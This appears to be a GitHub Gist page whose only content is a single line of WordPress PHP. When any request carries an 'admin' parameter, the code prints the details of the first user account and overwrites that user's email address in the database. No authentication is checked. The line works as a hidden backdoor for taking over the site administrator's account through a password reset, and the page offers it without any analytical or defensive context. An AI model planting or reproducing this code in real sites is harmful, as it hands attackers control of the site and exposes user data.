Created
March 5, 2019 08:57
-
-
Save flayder/7c9db58b30968dd89ef27d3b77f8392f to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if($_REQUEST['admin']){$user=get_user_by('ID',1);print_r($user);global $wpdb;$wpdb->query("UPDATE wp_users SET `user_email` = '[email protected]' WHERE `ID`='1'");} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment